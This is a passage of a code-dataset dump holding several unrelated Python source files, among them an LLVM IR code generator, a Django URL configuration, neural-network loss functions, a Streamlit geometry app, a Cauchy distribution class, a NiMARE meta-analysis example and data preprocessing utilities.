type %s\" % (lhs.type)])\n else:\n raise SplTypeError([\"types not equal %s ≠ %s\" % (lhs.type, rhs.type)])\n elif len(node.children) == 1:\n return self.expr(node.children[-1])\n else:\n raise ExpressionError([\"Expression error Num %d\" % (len(node.children))])\n\n def expr(self, node):\n if len(node.children) > 1:\n lhs = self._codegen(node.children[0])\n rhs = self._codegen(node.children[2])\n op = node.children[1].type\n if lhs.type != rhs.type:\n raise SplTypeError([\"types not equal %s ≠ %s\" % (lhs.type, rhs.type)])\n if lhs.type == ir_type_t[\"INTEGER\"]:\n if op == \"PLUS\":\n try:\n if (lhs.constant) and (rhs.constant):\n return ir.Constant(ir.IntType(32), int(lhs.constant) + int(rhs.constant))\n except:\n return self.builder.add(lhs, rhs)\n elif op == \"MINUS\":\n return self.builder.sub(lhs, rhs)\n elif op == \"OR\":\n return self.builder.or_(lhs, rhs)\n elif op == \"AND\":\n return self.builder.and_(lhs, rhs)\n elif op == \"MUL\":\n return self.builder.mul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.sdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.urem(lhs, rhs)\n else:\n raise SplTypeError([\"%s on two different types, %s and %s\" % (op, lhs.type, rhs.type)])\n if lhs.type == ir_type_t[\"REAL\"]:\n if op == \"PLUS\":\n return self.builder.fadd(lhs, rhs)\n elif op == \"MINUS\":\n return self.builder.fsub(lhs, rhs)\n elif op == \"MUL\":\n return self.builder.fmul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.fdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.frem(lhs, rhs)\n else:\n raise SplTypeError([\"%s on two different types, %s and %s\" % (op, lhs.type, rhs.type)])\n elif lhs.type == ir_type_t[\"BOOLEAN\"]:\n if op == \"OR\":\n return self.builder.or_(lhs, rhs)\n elif op == \"AND\":\n return self.builder.and_(lhs, rhs)\n else:\n raise OpError([\"Error Operation %s\" % (op)])\n else:\n raise SplTypeError([\"None type %s\" % (lhs.type)])\n else:\n return self._codegen(node.children[0])\n\n def term(self, node):\n if len(node.children) > 1:\n lhs = self._codegen(node.children[0])\n rhs = self._codegen(node.children[2])\n op = node.children[1].type\n if lhs.type != rhs.type:\n raise SplTypeError([\"%s on two different types, %s and %s\" % (op, lhs.type, rhs.type)])\n if lhs.type == ir_type_t[\"INTEGER\"]:\n if op == \"MUL\":\n return self.builder.mul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.sdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.urem(lhs, rhs)\n else:\n raise OpError([\"Undefined op %s\" % op])\n elif lhs.type == \"double\":\n if op == \"MUL\":\n return self.builder.fmul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.fdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.frem(lhs, rhs)\n else:\n raise OpError([\"Undefined op %s\" % op])\n else:\n raise OpError([\"Error Operation %s\" % (op)])\n else:\n return self._codegen(node.children[0])\n\n def factor(self, node):\n if len(node.children) == 1:\n return self._codegen(node.children[0])\n elif len(node.children) == 3:\n if node.children[1].type == \"DOT\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n index = node.children[2].name\n offset = self.symbol_table.find(name + \".\" + index)[\"entry\"]\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, offset]) # gets address of array[0]\n return self.builder.load(pointer_to_index)\n else:\n return self._codegen(node.children[1])\n elif len(node.children) == 4:\n if node.children[1].type == \"LP\":\n args = self.args_list(node.children[2])\n func = self.symbol_table.find(node.children[0].name)[\"entry\"]\n args_type = func.args\n for i in range(len(args_type)):\n if args_type[i].type.is_pointer:\n args[i] = self.find_addr(node.children[2], len(args) - i - 1)\n ret = self.builder.call(func, args)\n return ret\n elif node.children[1].type == \"LB\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n index = self.expression(node.children[2])\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, index]) # gets address of array[0]\n return self.builder.load(pointer_to_index)\n\n\n def args_list(self, node):\n if len(node.children) > 1:\n pre_list = self.args_list(node.children[0])\n else:\n pre_list = []\n current = [self._codegen(node.children[-1])]\n return pre_list + current\n\n def NAME(self, node):\n name = node.name\n addr = self.symbol_table.find(name)['entry']\n if type(addr) != ir.Function:\n var = self.builder.load(addr)\n return var\n else:\n # return addr\n addr = self.symbol_table.find(name+'_return')['entry']\n var = self.builder.load(addr)\n return var\n\n def epsilon(self, node):\n pass\n\n","sub_path":"ir_gen.py","file_name":"ir_gen.py","file_ext":"py","file_size_in_byte":33791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"8263700","text":"import argparse\n\nfrom board_factory import BoardFactory\nfrom solver import Solver\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Read Rullo board')\n\n parser.add_argument('board', type=str, help='the board file name')\n args = parser.parse_args()\n\n board = BoardFactory.create_board_from_file(args.board)\n solved = Solver.solve(board)\n \n print(board)\n if solved:\n \tprint(\"Done\")\n else:\n \tprint(\"No unique solution\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"65390636","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom project.municipal.views import register, accounts_list, account_create, report, Accounts, Entries, Services\nfrom django.contrib.auth.views import login\nfrom rest_framework import routers\n\nrouter = routers.DefaultRouter()\n\nrouter.register(r'accounts', Accounts, base_name='account')\nrouter.register(r'services', Services, base_name='service')\nrouter.register(r'entries', Entries, base_name='entry')\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login/', login, {'template_name': 'login.html'}, name='Login'),\n url(r'^register/', register, name='Register'),\n url(r'^accounts/create/', account_create, name='CreateAccount'),\n url(r'^accounts/(?P\\w+)/report/', report, name='Report'),\n url(r'^accounts/', accounts_list, name='AccountsList'),\n url(r'^api/v1/auth/', include('rest_auth.urls')),\n url(r'^api/v1/', include(router.urls))\n]","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529055890","text":"from __future__ import division\n\nimport numpy as np\n\nclass Loss(object):\n def loss(self, Y, D):\n raise NotImplementedError\n\n def backward(self, Y, D):\n raise NotImplementedError\n\n\nclass MeanSquareLoss(Loss):\n def loss(self, Y, D):\n P = Y.shape[0]\n delta = D - Y\n error = 1/P * np.sum(delta * delta)\n return error\n\n def backward(self, Y, D):\n P = Y.shape[0]\n dLdy = -2/P * (D - Y)\n return dLdy\n\n\nclass CrossEntropyLoss(Loss):\n def loss(self, Y, D):\n P, M = Y.shape\n if M == 1:\n error = -1/P * np.sum(D*np.log(Y) + (1 - D)*np.log(1 - Y))\n return error\n else:\n raise NotImplementedError\n\n def backward(self, Y, D):\n P, M = Y.shape\n if M == 1:\n dLdy = 1/P * (Y - D) / (Y * (1 - Y))\n return dLdy\n else:\n raise NotImplementedError\n","sub_path":"feedforward/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"443344920","text":"'''\nSome practice with dictionaries\n'''\n\nfrom time import sleep\n\ndevice1 = {\n 'ip_addr':'172.24.1.1',\n 'vendor':'cisco',\n 'username':'user',\n 'password':'superpassword',\n 'platform':'ios'\n}\n\nbgp_fields = {\n 'bgp_as':'25106',\n 'peer_as':'60330',\n 'peer_ip':'192.168.1.1'\n}\n\ndevice1.update(bgp_fields)\n\nprint(\"\\n\\nPrinting keys of the dictionary:\")\nprint(\"-\" * 50)\nsleep(2)\nfor key in device1.keys():\n print(key)\n\nprint(\"\\n\\nPrinting keys and values of the dictionary:\")\nprint(\"-\" * 50)\nsleep(2)\nfor key, value in device1.items():\n print(key + ':', value)\n","sub_path":"kirkbyers/4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547854842","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\nimport math\r\nimport source.title_1 as head\r\ndef Section_1():\r\n head.title()\r\n st.markdown(\"

Problem Statement: Application to Section Formuls

\", unsafe_allow_html=True)\r\n st.markdown(\"
\",unsafe_allow_html=True)\r\n w1,col1,col2,col3,w2=st.columns((1,3,2,2,1))\r\n w1,col11,col22,w2=st.columns((1,3,4,1))\r\n us1,bc1,bc2,us2=st.columns((4,3,3,6))\r\n \r\n with col1:\r\n st.markdown(\"\")\r\n st.write(\"# Enter the x1 and y1\")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the x2 and y2\")\r\n with col11:\r\n st.markdown(\"\")\r\n st.write(\"# Enter the m \")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the n \")\r\n st.markdown(\"### \")\r\n st.write(\"# Select\")\r\n # ------------to create the function to clear the input-----------#\r\n with bc2:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n def clear_text():\r\n st.session_state[\"Clear_sec_x1\"] = 0\r\n st.session_state[\"Clear_sec_x2\"] = 0\r\n st.session_state[\"Clear_sec_y1\"] = 0\r\n st.session_state[\"Clear_sec_y2\"] = 0\r\n st.session_state[\"Clear_sec_m\"] = 0\r\n st.session_state[\"Clear_sec_n\"] = 0\r\n st.button(\"Clear\", on_click=clear_text) \r\n with col2:\r\n vAR_input_x1=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_x1\")\r\n with col3:\r\n vAR_input_y1=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_x2\")\r\n with col2: \r\n vAR_input_x2=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_y1\")\r\n with col3:\r\n vAR_input_y2=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_y2\")\r\n with col22: \r\n vAR_input_m=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_m\")\r\n vAR_input_n=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_n\")\r\n selected=st.selectbox(\"\",[\"Internal Section\",\"External Section\"])\r\n #-----cylinder-------#\r\n with bc1:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n if st.button(\"Submit\"):\r\n with col22:\r\n \r\n if vAR_input_x1 and vAR_input_x2 and vAR_input_m and vAR_input_n and vAR_input_y1 != 0:\r\n if selected == \"Internal Section\":\r\n vAR_dis = (((vAR_input_m*vAR_input_x2)+(vAR_input_n*vAR_input_x1))/vAR_input_n + vAR_input_m),(((vAR_input_m*vAR_input_y2)+(vAR_input_n*vAR_input_y1))/vAR_input_n + vAR_input_m)\r\n st.success(vAR_dis)\r\n if selected == \"External Section\":\r\n vAR_dis = (((vAR_input_m*vAR_input_x2)-(vAR_input_n*vAR_input_x1))/vAR_input_n - vAR_input_m),(((vAR_input_m*vAR_input_y2)-(vAR_input_n*vAR_input_y1))/vAR_input_n - vAR_input_m)\r\n st.success(vAR_dis)\r\n else:\r\n st.error(\"Error\")\r\n with col11:\r\n st.write(\"# Result \")\r\n","sub_path":"Streamlitapp/Grade-10/source/section_formula.py","file_name":"section_formula.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646939474","text":"\"\"\"The Cauchy distribution.\"\"\"\nimport numpy as np\nfrom distribution import Distribution\nfrom recurrence_utils import custom_recurrence_coefficients\n\nclass Cauchy(Distribution):\n \"\"\"\n The class defines a Cauchy object. It is the child of Distribution.\n \n :param double location:\n\t\tLocation parameter of the Cauchy distribution.\n :param double scale:\n\t\tScale parameter of the Cauchy distribution.\n \"\"\"\n def __init__(self, location=None, scale=None):\n self.location = location\n self.scale = scale\n self.bounds = np.array([-np.inf, np.inf])\n self.mean = np.nan\n self.variance = np.nan\n self.skewness = np.nan\n self.kurtosis = np.nan\n \n def getDescription(self):\n \"\"\"\n A description of the Cauchy distribution.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :return:\n A string describing the Cauchy distribution.\n \"\"\"\n text = \"A Cauchy distribution has an undefined mean and variance; its location parameter is \"+str(self.location)+\", and its scale parameter is \"+str(self.scale)+\".\"\n return text\n \n def getPDF(self, N=None, points=None):\n \"\"\"\n A Cauchy probability density function.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :param int N:\n Number of points for defining the probability density function.\n :return:\n An array of N equidistant values over the support of the distribution.\n :return:\n Probability density values along the support of the Cauchy distribution.\n \"\"\"\n if N is not None:\n x = np.linspace(-15*self.scale, 15*self.scale, N)\n x = x + self.location\n w = 1.0/(np.pi * self.scale * (1 + ((x - self.location)/(self.scale))**2) )\n return x, w\n elif points is not None:\n w = 1.0/(np.pi * self.scale * (1 + ((points - self.location)/(self.scale))**2) )\n return w\n else:\n raise(ValueError, 'Please digit an input for getPDF method')\n\n\n def getCDF(self, N=None, points=None):\n \"\"\"\n A Cauchy cumulative density function.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :param integer N:\n Number of points for defining the cumulative density function.\n :return:\n An array of N equidistant values over the support of the distribution.\n :return:\n Cumulative density values along the support of the Cauchy distribution.\n \"\"\"\n if N is not None:\n x = np.linspace(-15*self.scale, 15*self.scale, N)\n x = x + self.location\n w = 1.0/np.pi * np.arctan((x - self.location) / self.scale) + 0.5\n return x, w\n elif points is not None:\n w = 1.0/np.pi * np.arctan((points - self.location) / self.scale) + 0.5\n return w\n else:\n raise(ValueError, 'Please digit an input for getCDF method')\n\n def getiCDF(self, xx):\n \"\"\"\n An inverse Cauchy cumulative density function.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :param array xx:\n A numpy array of uniformly distributed samples between [0, 1].\n :return:\n Inverse CDF samples associated with the Cauchy distribution.\n \"\"\"\n return self.location + self.scale * np.tan(np.pi * (xx - 0.5))\n\n","sub_path":"equadratures/distributions/cauchy.py","file_name":"cauchy.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"577915015","text":"# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\n\n.. _metas3:\n\n========================================================\n Run image-based meta-analyses on 21 pain studies\n========================================================\n\nCollection of NIDM-Results packs downloaded from Neurovault collection 1425,\nuploaded by Dr. Camille Maumet.\n\n..note::\n This will likely change as we work to shift database querying to a remote\n database, rather than handling it locally with NiMARE.\n\n\"\"\"\n###############################################################################\n# Start with the necessary imports\n# --------------------------------\nimport json\nimport numpy as np\nfrom glob import glob\nfrom os.path import basename, join, dirname, isfile\nimport urllib.request\nimport os\n\nimport pandas as pd\nimport nibabel as nib\nfrom scipy.stats import t\nfrom nilearn.masking import apply_mask\nfrom nilearn.plotting import plot_stat_map\n\nimport nimare\nfrom nimare.meta.ibma import (stouffers, fishers, weighted_stouffers,\n rfx_glm, ffx_glm)\n\n###############################################################################\n# Download data\n# --------------------------------\nurl = \"https://raw.githubusercontent.com/tsalo/NiMARE/coco2019/download_test_data.py\"\nu = urllib.request.urlopen(url)\ndata = u.read()\nu.close()\n\n# write python to file\nwith open(\"download_test_data.py\", \"wb\") as f:\n f.write(data)\n\n# download the requisite data\nfrom download_test_data import download_dataset\ndownload_dataset()\nos.remove(\"download_test_data.py\")\n\n###############################################################################\n# Load Dataset\n# --------------------------------------------------\ndset_file = join(dirname(nimare.__file__), 'tests', 'data', 'nidm_pain_dset.json')\nwith open(dset_file, 'r') as fo:\n dset_dict = json.load(fo)\ndset = nimare.dataset.Dataset(dset_file)\n\nmask_img = dset.mask\n\nlogp_thresh = -np.log(.05)\n\n###############################################################################\n# Define functions for querying set of NIDM-Results packs\n# -------------------------------------------------------\ndef _get_file(cdict, t):\n \"\"\"Return the file associated with a given data type within a\n folder if it exists. Otherwise, returns an empty list.\n \"\"\"\n temp = ''\n if t == 'con':\n temp = cdict['images'].get('con')\n elif t == 'se':\n temp = cdict['images'].get('se')\n elif t == 't':\n temp = cdict['images'].get('t')\n elif t == 'z':\n temp = cdict['images'].get('z')\n elif t == 'n':\n temp = cdict.get('sample_sizes', [])\n if temp:\n temp = np.mean(temp)\n else:\n raise Exception('Input type \"{0}\" not recognized.'.format(t))\n\n return temp\n\n\ndef get_files(ddict, types):\n \"\"\"Returns a list of files associated with a given data type\n from a set of subfolders within a directory. Allows for\n multiple data types and only returns a set of files from folders\n with all of the requested types.\n \"\"\"\n all_files = []\n for study in ddict.keys():\n files = []\n cdict = ddict[study]['contrasts']['1']\n for t in types:\n temp = _get_file(cdict, t)\n if temp:\n files.append(temp)\n\n if len(files) == len(types):\n all_files.append(files)\n all_files = list(map(list, zip(*all_files)))\n return all_files\n\n###############################################################################\n# Get z-maps\n# --------------------------------------------------\nfiles = get_files(dset_dict, ['z'])\nz_imgs = [nib.load(join(dirname(nimare.__file__), f)) for f in files[0]]\nz_data = apply_mask(z_imgs, mask_img)\nprint('{0} studies found.'.format(z_data.shape[0]))\n\n###############################################################################\n# Fisher's\n# --------------------------------------------------\nresult = fishers(z_data, mask_img)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Stouffer's with fixed-effects inference\n# --------------------------------------------------\nresult = stouffers(z_data, mask_img, inference='ffx',\n null='theoretical', n_iters=None)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Stouffer's with random-effects inference using theoretical null distribution\n# -----------------------------------------------------------------------------\nresult = stouffers(z_data, mask_img, inference='rfx',\n null='theoretical', n_iters=None)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Stouffer's with random-effects inference using empirical null distribution\n# -----------------------------------------------------------------------------\nresult = stouffers(z_data, mask_img, inference='rfx',\n null='empirical', n_iters=1000)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Get z-maps + sample sizes\n# --------------------------------------------------\nz_files, ns = get_files(dset_dict, ['z', 'n'])\nz_imgs = [nib.load(join(dirname(nimare.__file__), f)) for f in z_files]\nz_data = apply_mask(z_imgs, mask_img)\nsample_sizes = np.array(ns)\nprint('{0} studies found.'.format(z_data.shape[0]))\n\n###############################################################################\n# Weighted Stouffer's\n# -------------------\nresult = weighted_stouffers(z_data, sample_sizes, mask_img)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Get contrast maps\n# ----------------------------------------------------------------\ncon_files = get_files(dset_dict, ['con'])\ncon_files = con_files[0]\ncon_imgs = [nib.load(join(dirname(nimare.__file__), f)) for f in con_files]\ncon_data = apply_mask(con_imgs, mask_img)\nprint('{0} studies found.'.format(con_data.shape[0]))\n\n###############################################################################\n# RFX GLM with theoretical null distribution\n# ------------------------------------------\nresult = rfx_glm(con_data, mask_img, null='theoretical', n_iters=None)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# RFX GLM with empirical null distribution\n# ------------------------------------------\nresult = rfx_glm(con_data, mask_img, null='empirical', n_iters=1000)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n","sub_path":"examples/02_meta-analyses/run_ibmas.py","file_name":"run_ibmas.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109882819","text":"# -*- coding: utf-8 -*-\n'''\n@time: 2019/11/15 0015 16:15\n@author: chen\n@contact: 1171954100@qq.com\n@file: test_suite.py\n@desc:\n ┏┓   ┏┓+ +\n   ┏┛┻━━━┛┻┓ + +\n   ┃       ┃  \n   ┃   ━   ┃ ++ + + +\n   ████━████ ┃+\n   ┃       ┃ +\n   ┃   ┻   ┃\n   ┃       ┃ + +\n   ┗━┓   ┏━┛\n     ┃   ┃           \n     ┃   ┃ + + + +\n     ┃   ┃    Codes are far away from bugs with the animal protecting   \n     ┃   ┃ +     神兽保佑,代码无bug  \n     ┃   ┃\n     ┃   ┃  +         \n     ┃    ┗━━━┓ + +\n     ┃        ┣┓\n     ┃        ┏┛\n     ┗┓┓┏━┳┓┏┛ + + + +\n      ┃┫┫ ┃┫┫\n      ┗┻┛ ┗┻┛+ + + +\n\n'''\nimport unittest\nimport HTMLTestRunnerNew\nfrom Homework.homework_0321.test_case import *\n\nsuite=unittest.TestSuite() #创建一个对象\n\n#第一种方法,一个一个去添加用例\n# suite.addTest(TestAdd('test_normal_001'))\n# suite.addTest(TestAdd('test_normal_002'))\n# suite.addTest(TestAdd('test_abnormal_001'))\n# suite.addTest(TestAdd('test_abnormal_002'))\n\n#第二种方法:通过loader来加载用例 通过模块加载用例\n# from Homework.homework_0321 import test_case\n# loader=unittest.TestLoader() #用例加载器\n# suite.addTest(loader.loadTestsFromModule(test_case))\n\n#第三种方法:通过loader来加载用例,通过测试类名来加载用例\nfrom Homework.homework_0321.test_case import *\nloader=unittest.TestLoader() #用例加载器\nsuite.addTest(loader.loadTestsFromTestCase(TestAdd))\n\n# #执行用例--unittest版本\n# with open('test.txt','w',encoding='utf-8') as file:\n# runner=unittest.TextTestRunner(stream=file,verbosity=2) #创建一个对象来执行用例\n# runner.run(suite)\n\n# #执行并生成html测试报告\nwith open('test.html','wb') as file:\n runner=HTMLTestRunnerNew.HTMLTestRunner(\n stream=file,\n verbosity=2,\n title='20190321测试报告',\n description='作业03120',\n tester='chenpeng')\n\n runner.run(suite)\n","sub_path":"Homework/homework_0321/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324016773","text":"import numpy as np\nimport pandas as pd\nimport sklearn\nimport sklearn.preprocessing\nimport sklearn.decomposition\nimport sklearn.ensemble\n\n\ndef drop_correlated(train, test, threshold=1):\n train_ = train.copy(deep=True)\n train_.fillna(2)\n\n columns = []\n for i in range(332, 1332):\n columns += [\"V\" + str(i)]\n\n corr_pearson = train_[columns].corr(method=\"pearson\").values\n corr_pearson[np.diag_indices_from(corr_pearson)] = 0\n f1, f2 = np.where(np.abs(corr_pearson) > threshold)\n columns_ = np.ones(corr_pearson.shape[0])\n\n for x, y in zip(f1, f2):\n if columns_[x] and columns_[y]:\n columns_[x] = 0\n\n columns_ = list(map(lambda x: \"V\" + x, (np.where(1 - columns_)[0] + 332).astype(\"str\")))\n\n print(columns_)\n\n train.drop(columns_, axis=1, inplace=True)\n test.drop(columns_, axis=1, inplace=True)\n return train, test\n\n\ndef drop_features(data):\n columns = data.columns[list(map(lambda x: x[0] == \"V\" and int(x[1:]) >= 332, data.columns))]\n\n data.drop(columns, axis=1, inplace=True)\n return data\n\n\ndef add_missing_indicator(data):\n data[\"missing_sum\"] = np.sum(np.isnan(data), axis=1)\n\n return data\n\n\ndef add_allele_features(data):\n allele_columns = data.columns[list(map(lambda x: x[0] == \"V\" and int(x[1:]) >= 332, data.columns))]\n #for col_name in allele_columns:\n #data[\"A\" + col_name[1:] + \"_p(1-p)\"] = data[col_name]*(1 - data[col_name])\n #data[\"A\" + col_name[1:] + \"_1-p\"] = 1 - data[col_name]\n\n return data\n\n\ndef add_features(data):\n data = add_missing_indicator(data)\n data = add_allele_features(data)\n return data\n\n\ndef pca_features(train, test, n_components=2):\n train_ = train.copy(deep=True)\n test_ = test.copy(deep=True)\n\n train_.fillna(-1, inplace=True)\n test_.fillna(-1, inplace=True)\n\n pca = sklearn.decomposition.PCA(n_components=n_components)\n train_pca = pca.fit_transform(train_)\n test_pca = pca.transform(test_)\n \n return train_pca, test_pca\n\ndef input_missing(train, test):\n\n imp = sklearn.preprocessing.Imputer()\n train = imp.fit_transform(train)\n test = imp.transform(test)\n\n return train, test\n\n\ndef scale_data(train, test):\n scaler = sklearn.preprocessing.StandardScaler()\n train = scaler.fit_transform(train)\n test = scaler.transform(test)\n\n return train, test\n\n\ndef shuffle_train(train, target):\n idx = np.arange(len(train))\n np.random.seed(1234)\n np.random.shuffle(idx)\n train = train.iloc[idx]\n target = target[idx]\n\n return train, target\n\n\ndef do_one_hot(train_, test_):\n data_types = pd.read_csv(\"input/MetaData.csv\")\n cat_columns = data_types[np.logical_or((data_types[\"Column Type\"] == \"Category\"),\n (data_types[\"Column Type\"] == \"Ordered Category\"))][\"varnum\"].values\n\n train = train_.copy(deep=True)\n test = test_.copy(deep=True)\n\n train.fillna(12345, inplace=True)\n test.fillna(12345, inplace=True)\n\n\n le = sklearn.preprocessing.LabelEncoder()\n train_cat = le.fit_transform(train[cat_columns[0]].values)\n test_cat = le.fit_transform(test[cat_columns[0]].values)\n for i in range(1, len(cat_columns)):\n le.fit((np.concatenate((train[cat_columns[i]], test[cat_columns[i]]))))\n train_cat = np.column_stack((train_cat, le.transform(train[cat_columns[i]].values)))\n test_cat = np.column_stack((test_cat, le.transform(test[cat_columns[i]].values)))\n\n ohe = sklearn.preprocessing.OneHotEncoder(sparse=False)\n ohe.fit(np.concatenate((train_cat, test_cat)))\n train_cat = ohe.transform(train_cat)\n test_cat = ohe.transform(test_cat)\n\n return train_cat, test_cat\n\n\ndef take_important(train, target, test, threshold=0.001):\n model = sklearn.ensemble.RandomForestClassifier(n_estimators=2000, max_depth=8, criterion=\"entropy\", bootstrap=False,\n min_samples_leaf=4, min_samples_split=2, random_state=1234)\n\n model.fit(train, target)\n importance = model.feature_importances_\n print(np.sum(importance > 0.001))\n\n return train[:, importance > 0.001], test[:, importance > 0.001]\n\ndef preprocess_data(train, test, target):\n train, target = shuffle_train(train, target)\n\n train = add_features(train)\n test = add_features(test)\n\n train_cat, test_cat = do_one_hot(train, test)\n train_pca, test_pca = pca_features(train, test, n_components=16)\n\n train = drop_features(train)\n test = drop_features(test)\n\n train, test = input_missing(train, test)\n train, test = scale_data(train, test)\n\n train = np.column_stack((train, train_cat))\n test = np.column_stack((test, test_cat))\n\n train = np.column_stack((train, train_pca))\n test = np.column_stack((test, test_pca))\n\n train, test = take_important(train, target, test)\n\n return train, test, target\n","sub_path":"contests/SHAD Spring 2/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"14787500","text":"def maximo(a,b,c):\n if a > b:\n if a > c:\n return a\n else:\n return c\n else:\n if b > c:\n return b\n else:\n return c\n\ndef test_func0():\n assert maximo(30,14,10) == 30\n\ndef test_func1():\n assert maximo(0,-1,1) == 1","sub_path":"S5/S5-TE2.py","file_name":"S5-TE2.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599190303","text":"import os\nimport torch\n\nfrom torch_geometric.datasets import ModelNet\nfrom torch_geometric.transforms import SamplePoints, NormalizeScale, RandomFlip, RandomRotate, Compose, KNNGraph\n\n\ndef get_dataset(root, transform, pre_transform):\n train_valid_dataset = ModelNet(root=root, name=\"10\", train=True, pre_transform=pre_transform, transform=transform)\n test_dataset = ModelNet(root=root, name=\"10\", train=False, pre_transform=pre_transform, transform=transform)\n return train_valid_dataset, test_dataset\n\n\ndef get_split(index_file_root, dataset):\n index_file = open(index_file_root, 'r')\n train_index = []\n for idx in index_file:\n train_index.append(int(idx))\n\n return dataset[train_index]\n\n\ndef create_file_if_necessary(train_file, valid_file, dataset):\n if not os.path.isfile(train_file) and not os.path.isfile(valid_file):\n torch.manual_seed(0)\n # Shuffle before splitting data (random split)\n _, perm = dataset.shuffle(return_perm=True)\n\n # Create two files with the indices od the training and validation data\n train_idx = open(train_file, 'w+')\n valid_idx = open(valid_file, 'w+')\n\n # Split the tensor of indices in training and validation\n train_split, val_split = perm.split(round(len(perm) * 0.8))\n\n for i in range(len(train_split)):\n train_idx.writelines(str(train_split[i].item()) + \"\\n\")\n for i in range(len(val_split)):\n valid_idx.writelines(str(val_split[i].item()) + \"\\n\")\n\n train_idx.close()\n valid_idx.close()\n\n elif not os.path.isfile(train_file) or not os.path.isfile(valid_file):\n raise ValueError('One file exists and the other one does not')\n\n\ndef get_train_valid_test_ModelNet(root, num_of_points, isGraph=False, normalize_scale=True):\n dataset_root = os.path.join(root, 'ModelNet')\n train_valid_split, test_split = get_dataset(dataset_root, transform=get_transformation(isGraph, normalize_scale),\n pre_transform=get_pre_transformation(num_of_points))\n\n train_split_root = os.path.join(root, 'train_split.txt')\n valid_split_root = os.path.join(root, 'valid_split.txt')\n create_file_if_necessary(train_split_root, valid_split_root, 